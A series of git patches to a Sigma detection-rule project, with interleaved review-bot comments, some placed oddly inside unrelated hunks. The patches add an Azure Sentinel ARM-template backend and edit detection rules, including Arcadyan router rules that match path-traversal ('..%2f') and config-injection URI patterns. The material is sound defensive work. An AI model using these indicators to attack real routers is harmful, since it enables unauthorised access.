 def create_rule(self, config):
 tags = config.get("tags", [])
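Review bot: `timeframeToDelta` returns `None` for any unit other than s/m/h/d and also for a zero amount (`timedelta(0)` is falsy, so the `and/or` chain falls through to `None`), and `int(timeframe[:-1])` raises a bare ValueError on a malformed string; the caller in the next hunk then computes `timeframe * 5`, which raises TypeError on `None`, so a rule with an unsupported timeframe aborts with an error that names neither the rule field nor the value. If the Sigma spec's month unit is used anywhere in the corpus it hits the same path. Validate explicitly, raise the backend's own `NotSupportedError` (already used in this class), and use a unit table instead of the `and/or` chain. `iso8601_duration` reads fine; a one-line docstring such as `"""Render a timedelta as an ISO 8601 duration (e.g. P1DT2H), the form used for queryFrequency."""` would make its contract explicit.
```python
    _TIMEFRAME_UNITS = {"s": "seconds", "m": "minutes", "h": "hours", "d": "days"}

    def timeframeToDelta(self, timeframe):
        """Parse a Sigma timeframe such as '30m' into a timedelta; raise NotSupportedError otherwise."""
        unit, amount = timeframe[-1:], timeframe[:-1]
        if unit not in self._TIMEFRAME_UNITS or not amount.isdigit():
            raise NotSupportedError("Unsupported timeframe %r" % (timeframe,))
        return timedelta(**{self._TIMEFRAME_UNITS[unit]: int(amount)})

    # … unchanged: iso8601_duration …
```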
@@ -430,17 +454,21 @@ class AzureAPIBackend(AzureLogAnalyticsBackend):
 tactics, technics = self.skip_tactics_or_techniques(technics, tactics)
 tactics = list(map(lambda s: s.replace(" ", ""), tactics))
+ timeframe = self.timeframeToDelta(config["detection"].setdefault("timeframe", "30m"))
+ queryDuration = self.iso8601_duration(timeframe)
+ suppressionDuration = self.iso8601_duration(timeframe * 5)
+
 rule = {
 "displayName": "{} by {}".format(config.get("title"), config.get('author')),
 "description": "{} {}".format(config.get("description"), "Technique: {}.".format(",".join(technics))),
 "severity": self.parse_severity(config.get("level", "medium")),
 "enabled": True,
 "query": config.get("translation"),
- "queryFrequency": "12H",
- "queryPeriod": "12H",
+ "queryFrequency": queryDuration,
+ "queryPeriod": queryDuration,
 "triggerOperator": "GreaterThan",
 "triggerThreshold": 0,
- "suppressionDuration": "12H",
+ "suppressionDuration": suppressionDuration,
 "suppressionEnabled": True,
 "tactics": tactics
 }
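Review bot: `config["detection"].setdefault("timeframe", "30m")` writes the default back into the parsed rule, and the Sentinel subclass passes `sigmaparser.parsedyaml` straight into this method, so a rule that declared no timeframe comes out of conversion looking as if it had one; `config["detection"].get("timeframe", "30m")` yields the same value without the side effect. Using one value for both `queryFrequency` and `queryPeriod` makes a rule's aggregation window also decide how often the query runs, so a `timeframe: 5s` rule emits `PT5S`, which I believe Sentinel rejects as below its minimum frequency; either clamp or document the mapping with `# queryFrequency == queryPeriod: each run looks back exactly one timeframe, no overlap`. `timeframe * 5` raises TypeError when `timeframeToDelta` returned `None` for an unknown unit, so that helper needs to fail loudly before this line is reached.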
@@ -455,3 +483,66 @@ class AzureAPIBackend(AzureLogAnalyticsBackend):
 return rule
 else:
 raise NotSupportedError("No table could be determined from Sigma rule")
+
+class SentinelBackend(AzureAPIBackend):
+ """Converts Sigma rule into Azure Sentinel scheduled alert rule ARM template."""
+ identifier = "sentinel-rule"
+ active = True
+
+ def __init__(self, *args, **kwargs):
+ super().__init__(*args, **kwargs)
+
+ def generate(self, sigmaparser):
+ translation = super().generate(sigmaparser)
+ if translation:
+ configs = sigmaparser.parsedyaml
+ configs.update({"translation": translation})
+ rule = self.create_sentinel_rule(configs)
+ return json.dumps(rule)
+
+ def create_sentinel_rule(self, config):
+ # https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/child-resource-name-type#outside-parent-resource
+ # https://docs.microsoft.com/en-us/azure/templates/microsoft.operationalinsights/workspaces?tabs=json
+ # https://docs.microsoft.com/en-us/rest/api/securityinsights/alert-rules/create-or-update#scheduledalertrule
+ properties = json.loads(config.get("translation"))
+ properties.update({
+ "incidentConfiguration": {
+ "createIncident": True,
+ "groupingConfiguration": {
+ "enabled": False,
+ "reopenClosedIncident": False,
+ "lookbackDuration": properties['suppressionDuration'],
+ "matchingMethod": "AllEntities",
+ "groupByEntities": [],
+ "groupByAlertDetails": [],
+ "groupByCustomDetails": [],
+ },
+ },
+ "eventGroupingSettings": {
+ "aggregationKind": "SingleAlert",
+ },
+ "alertDetailsOverride": None,
+ "customDetails": None,
+ "templateVersion": "1.0.0",
+ })
+ rule_uuid = config.get("id", str(uuid4()))
+ return {
+ "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+ "contentVersion": "1.0.0.0",
+ "parameters": {
+ "workspace": {
+ "type": "String",
+ },
+ },
+ "resources": [
+ {
+ "id": "[concat(resourceId('Microsoft.OperationalInsights/workspaces/providers', parameters('workspace'),
'Microsoft.SecurityInsights'),'/alertRules/" + rule_uuid + "')]", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/" + rule_uuid + "')]", + "type": "Microsoft.OperationalInsights/workspaces/providers/alertRules", + "apiVersion": "2021-03-01-preview", + + "kind": "Scheduled", + "properties": properties, + }, + ], + } From c1154e7b454c1a3f1a76c164f8244a0a81afda24 Mon Sep 17 00:00:00 2001 From: Young Date: Tue, 24 Aug 2021 16:24:45 -0700 Subject: [PATCH 0571/1367] removed osMonitor.json --- .DS_Store | Bin 8196 -> 8196 bytes tools/.DS_Store | Bin 6148 -> 6148 bytes tools/osMonitor.json | 1 - 3 files changed, 1 deletion(-) delete mode 100644 tools/osMonitor.json diff --git a/.DS_Store b/.DS_Store index b70b452d0071309beb8e844f281cb3104d236e61..ec1c03f419ae50d6a9f11096836056b8ba0ed345 100644 GIT binary patch delta 67 wcmZp1XmQwJCn{oOVyUBGVs2Keqfl*WXsn}PYGOKhyO8$Vn7kkoc!dZ boctsP1_l8jb_C*io0V8sGHqt(_{$Ff=H3!# diff --git a/tools/osMonitor.json b/tools/osMonitor.json deleted file mode 100644 index 1bc384ef..00000000 --- a/tools/osMonitor.json +++ /dev/null 
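Review bot: `rule_uuid = config.get("id", str(uuid4()))` takes the rule's `id` field as-is and splices it into ARM template expressions (`"[concat(... '/alertRules/" + rule_uuid + "')]"` and the `name` line), so an id containing a quote, `)` or `]` produces a broken template, and for a rule file from an untrusted source could produce an attacker-shaped expression; nothing checks that the value is a UUID. Parse it first, `rule_uuid = str(UUID(str(config["id"]))) if "id" in config else str(uuid4())`, extending the import added in the earlier hunk to `from uuid import UUID, uuid4`, so a malformed id fails at conversion time with a ValueError instead of at deployment. Falling back to a fresh uuid4 for rules without an id also makes the output non-idempotent (every conversion deploys a new alert rule), which deserves either a comment or a `NotSupportedError`. `properties['suppressionDuration']` relies on the parent's JSON always carrying that key, which holds only because `create_rule` always emits it; a short comment saying so would spare the next reader a search.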
@@ -1 +0,0 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.channel": "\"Security\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"5156\""}}]}}, {"bool": {"should": [{"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.SourcePort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.DestAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.DestAddress.keyword": "\\:\\:1"}}]}}]}}, {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.DestPort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.SourceAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.SourceAddress.keyword": "\\:\\:1"}}]}}]}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} 
From a4d0e3453d5a72ef39850089ab204fe17badc694 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 25 Aug 2021 10:24:15 +0545 Subject: [PATCH 0572/1367] Fix for CVE tag --- ...b_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml index 7cda3b67..a816bc22 100644 --- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml +++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml @@ -4,21 +4,20 @@ id: f0500377-bc70-425d-ac8c-e956cd906871 status: experimental description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091. references: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091 + - https://nvd.nist.gov/vuln/detail/cve-2021-20090 + - https://nvd.nist.gov/vuln/detail/cve-2021-20091 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 - https://www.tenable.com/security/research/tra-2021-13 - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild author: Bhabesh Raj date: 2021/08/24 +modified: 2021/08/25 falsepositives: - Unknown level: critical tags: - attack.initial_access - attack.t1190 - - cve.2021-20090 - - cve.2021-20091 --- logsource: # CVE-2021-20090 (Path Traversal) category: webserver From df4180547ef43e43820f5277cc5a750f4b548e25 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 25 Aug 2021 11:18:51 +0545 Subject: [PATCH 0573/1367] Merged rules --- ...uter_cve_2021_20090_2021_20091_exploit.yml | 27 ++++--------------- 1 file changed, 5 insertions(+), 22 deletions(-) 
diff --git a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml
index a816bc22..06718546 100644
--- a/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml
+++ b/rules/web/web_arcadyan_router_cve_2021_20090_2021_20091_exploit.yml
@@ -1,4 +1,3 @@
-action: global
 title: Arcadyan Router Exploitations
 id: f0500377-bc70-425d-ac8c-e956cd906871
 status: experimental
@@ -18,30 +17,14 @@ level: critical
 tags:
 - attack.initial_access
 - attack.t1190
----
-logsource: # CVE-2021-20090 (Path Traversal)
+logsource:
 category: webserver
 detection:
 path_traversal:
- c-uri|contains:
+ c-uri|contains: # CVE-2021-20090 (Bypass Auth: Path Traversal)
 - '..%2f'
- noauth_list:
- c-uri|contains:
- - '/images/'
- - '/js/'
- - '/css/'
- - '/setup_top_login.htm'
- - '/login.html'
- - '/loginerror.html'
- - '/loginexclude.html'
- - '/loginlock.html'
- condition: path_traversal and noauth_list
----
-logsource: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection)
- category: webserver
-detection:
- path_traversal:
- c-uri|contains|all:
+ config_file_inj:
+ c-uri|contains|all: # Chaining of CVE-2021-20090 (Bypass Auth) and CVE-2021-20091 (Config File Injection)
 - '..%2f'
 - 'apply_abstract.cgi'
 noauth_list:
@@ -54,4 +37,4 @@ detection:
 - '/loginerror.html'
 - '/loginexclude.html'
 - '/loginlock.html'
- condition: path_traversal and noauth_list
\ No newline at end of file
+ condition: (path_traversal or config_file_inj) and noauth_list
\ No newline at end of file
From 1d725e8519247d7bda21d6c02d826c9533cca11e Mon Sep 17 00:00:00 2001
From: frack113
Date: Wed, 25 Aug 2021 08:15:18 +0200
Subject: [PATCH 0574/1367] add gworkspace_user_granted_admin_privileges.yml
---
 ...orkspace_user_granted_admin_privileges.yml | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml
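Review bot: After the merge `config_file_inj` is a strict subset of `path_traversal` (`c-uri|contains|all` of `..%2f` and `apply_abstract.cgi` implies `c-uri|contains: '..%2f'`), so `(path_traversal or config_file_inj)` is equivalent to `path_traversal` and the CVE-2021-20091 selection is dead: a chained config-injection request is no longer distinguishable from a plain traversal probe in the match. Either keep the two patterns as separate rules (the `action: global` layout this hunk removes) so the config-injection hit can carry its own level and description, or, if one rule is wanted, drop `config_file_inj` and state in the description that `apply_abstract.cgi` in the URI is the CVE-2021-20091 indicator. If the selection is kept for documentation value, add `# subset of path_traversal, kept only to name the CVE-2021-20091 pattern` above it so nobody expects it to narrow the match.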
diff --git a/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml new file mode 100644 index 00000000..ffc061d0 --- /dev/null +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -0,0 +1,24 @@ +title: Google Workspace User Granted Admin Privileges +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an Google Workspace user is granted admin privileges. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + eventName: + - GRANT_DELEGATED_ADMIN_PRIVILEGES + - GRANT_ADMIN_PRIVILEGE + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role privileges, may be modified by system administrators. \ No newline at end of file From a4021842de4aeecbf2dea05cf8154280da921a31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 25 Aug 2021 09:15:57 +0200 Subject: [PATCH 0575/1367] Fix invalid tags --- rules/compliance/cleartext_protocols.yml | 86 +++++++++---------- .../compliance/default_credentials_usage.yml | 52 +++++------ .../compliance/group_modification_logging.yml | 52 +++++------ rules/compliance/host_without_firewall.yml | 24 +++--- rules/compliance/workstation_was_locked.yml | 48 +++++------ .../process_creation/win_apt_unc2452_cmds.yml | 4 +- .../process_creation/win_apt_unc2452_ps.yml | 2 +- ...susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../sysmon_susp_reg_persist_explorer_run.yml | 2 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 2 +- tests/test_rules.py | 22 ++--- 11 files changed, 148 insertions(+), 148 deletions(-) 
diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/cleartext_protocols.yml index eb1acd9c..40905d70 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/cleartext_protocols.yml 
@@ -13,49 +13,49 @@ references: falsepositives: - unknown level: low -tags: - - CSC4 - - CSC4.5 - - CSC14 - - CSC14.4 - - CSC16 - - CSC16.5 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - NIST CSF 1.1 PR.AC-1 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AC-5 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 PR.DS-1 - - NIST CSF 1.1 PR.DS-2 - - ISO 27002-2013 A.9.2.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - ISO 27002-2013 A.8.3.1 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.10.1.1 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 3.2 8.7 - - PCI DSS 3.2 8.8 - - PCI DSS 3.2 1.3 - - PCI DSS 3.2 1.4 - - PCI DSS 3.2 4.3 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - 
PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 --- logsource: product: netflow diff --git a/rules/compliance/default_credentials_usage.yml b/rules/compliance/default_credentials_usage.yml index 297e16aa..fa9c67ce 100644 --- a/rules/compliance/default_credentials_usage.yml +++ b/rules/compliance/default_credentials_usage.yml @@ -81,29 +81,29 @@ detection: falsepositives: - unknown level: medium -tags: - - CSC4 - - CSC4.2 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 3.2 8.7 +# tags: + # - CSC4 + # - CSC4.2 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/rules/compliance/group_modification_logging.yml b/rules/compliance/group_modification_logging.yml index 083cc2b6..0da15dea 100644 --- a/rules/compliance/group_modification_logging.yml +++ b/rules/compliance/group_modification_logging.yml 
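Review bot: Commenting out the whole `tags:` block discards the CIS/NIST/ISO/PCI control mappings from the machine-readable rule instead of fixing them, so any consumer of these compliance rules loses the only structured link to the controls, and forty-odd commented lines are the kind of dead content that goes stale unnoticed. If the tag test changed in this commit (not visible here) rejects these namespaces, the cheaper fix is to keep them in a shape it accepts, e.g. a dotted namespace such as `compliance.csc.4.5` or `compliance.pci_dss.3.2.2.1`, or to move them to a dedicated field the test ignores, rather than to strip them. At minimum replace the commented block with one line saying why, e.g. `# control mappings removed until the tag test accepts a compliance namespace`.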
@@ -33,29 +33,29 @@ detection: falsepositives: - unknown level: low -tags: - - CSC4 - - CSC4.8 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 3.2 8.7 +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/rules/compliance/host_without_firewall.yml b/rules/compliance/host_without_firewall.yml index cab122e0..ae9a76a7 100644 --- a/rules/compliance/host_without_firewall.yml +++ b/rules/compliance/host_without_firewall.yml 
@@ -17,15 +17,15 @@ detection: host.scan.vuln_name: Firewall Product Not Detected* condition: selection level: low -tags: - - CSC9 - - CSC9.4 - - NIST CSF 1.1 PR.AC-5 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 DE.AE-1 - - ISO 27002-2013 A.9.1.2 - - ISO 27002-2013 A.13.2.1 - - ISO 27002-2013 A.13.2.2 - - ISO 27002-2013 A.14.1.2 - - PCI DSS 3.2 1.4 +# tags: + # - CSC9 + # - CSC9.4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 DE.AE-1 + # - ISO 27002-2013 A.9.1.2 + # - ISO 27002-2013 A.13.2.1 + # - ISO 27002-2013 A.13.2.2 + # - ISO 27002-2013 A.14.1.2 + # - PCI DSS 3.2 1.4 diff --git a/rules/compliance/workstation_was_locked.yml b/rules/compliance/workstation_was_locked.yml index 37fd37c9..0cb5033c 100644 --- a/rules/compliance/workstation_was_locked.yml +++ b/rules/compliance/workstation_was_locked.yml 
@@ -21,27 +21,27 @@ detection: falsepositives: - unknown level: low -tags: - - CSC16 - - CSC16.11 - - ISO27002-2013 A.9.1.1 - - ISO27002-2013 A.9.2.1 - - ISO27002-2013 A.9.2.2 - - ISO27002-2013 A.9.2.3 - - ISO27002-2013 A.9.2.4 - - ISO27002-2013 A.9.2.5 - - ISO27002-2013 A.9.2.6 - - ISO27002-2013 A.9.3.1 - - ISO27002-2013 A.9.4.1 - - ISO27002-2013 A.9.4.3 - - ISO27002-2013 A.11.2.8 - - PCI DSS 3.1 7.1 - - PCI DSS 3.1 7.2 - - PCI DSS 3.1 7.3 - - PCI DSS 3.1 8.7 - - PCI DSS 3.1 8.8 - - NIST CSF 1.1 PR.AC-1 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 PR.PT-3 +# tags: + # - CSC16 + # - CSC16.11 + # - ISO27002-2013 A.9.1.1 + # - ISO27002-2013 A.9.2.1 + # - ISO27002-2013 A.9.2.2 + # - ISO27002-2013 A.9.2.3 + # - ISO27002-2013 A.9.2.4 + # - ISO27002-2013 A.9.2.5 + # - ISO27002-2013 A.9.2.6 + # - ISO27002-2013 A.9.3.1 + # - ISO27002-2013 A.9.4.1 + # - ISO27002-2013 A.9.4.3 + # - ISO27002-2013 A.11.2.8 + # - PCI DSS 3.1 7.1 + # - PCI DSS 3.1 7.2 + # - PCI DSS 3.1 7.3 + # - PCI DSS 3.1 8.7 + # - PCI DSS 3.1 8.8 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.PT-3 diff --git a/rules/windows/process_creation/win_apt_unc2452_cmds.yml b/rules/windows/process_creation/win_apt_unc2452_cmds.yml index b1c08180..be14932e 100644 --- a/rules/windows/process_creation/win_apt_unc2452_cmds.yml +++ b/rules/windows/process_creation/win_apt_unc2452_cmds.yml @@ -7,8 +7,8 @@ references: tags: - attack.execution - attack.t1059.001 - - sunburst - - unc2452 + # - sunburst + # - unc2452 author: Florian Roth date: 2021/01/22 modified: 2021/06/27 diff --git a/rules/windows/process_creation/win_apt_unc2452_ps.yml b/rules/windows/process_creation/win_apt_unc2452_ps.yml index 89de914d..5575f09f 100644 --- a/rules/windows/process_creation/win_apt_unc2452_ps.yml +++ b/rules/windows/process_creation/win_apt_unc2452_ps.yml 
@@ -9,7 +9,7 @@ tags: - attack.execution - attack.t1059.001 - attack.t1047 - - sunburst + # - sunburst author: Florian Roth date: 2021/01/20 modified: 2021/01/22 diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index f6208a36..4056fcdb 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -13,7 +13,7 @@ logsource: tags: - attack.persistence - attack.t1136.001 - - threat_group.DEV-0322 + # - threat_group.DEV-0322 detection: selection1: CommandLine|contains: 'whoami' diff --git a/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml b/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml index 2c6ae5ca..b1ce684a 100755 --- a/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml +++ b/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml @@ -28,7 +28,7 @@ tags: - attack.persistence - attack.t1060 # an old one - attack.t1547.001 - - capec.270 + # - capec.270 fields: - Image - ParentImage diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index d0117429..eea60e94 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -15,7 +15,7 @@ tags: - attack.credential_access - attack.t1566 - attack.t1203 - - threat_group.Sourgum + # - threat_group.Sourgum falsepositives: - Unlikely level: critical diff --git a/tests/test_rules.py b/tests/test_rules.py index f712875f..4c01de39 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -79,17 +79,17 @@ class TestRules(unittest.TestCase):
 for file in self.yield_next_rule_file_path(self.path_to_rules):
 tags = self.get_rule_part(file_path=file, part_name="tags")
 if tags:
- for tag in tags:
- if tag.startswith("attack."):
- continue
- elif tag.startswith("car."):
- continue
- elif tag.startswith("cve."):
- print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag))
- files_with_incorrect_tags.append(file)
- else:
- print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag))
- # files_with_incorrect_tags.append(file)
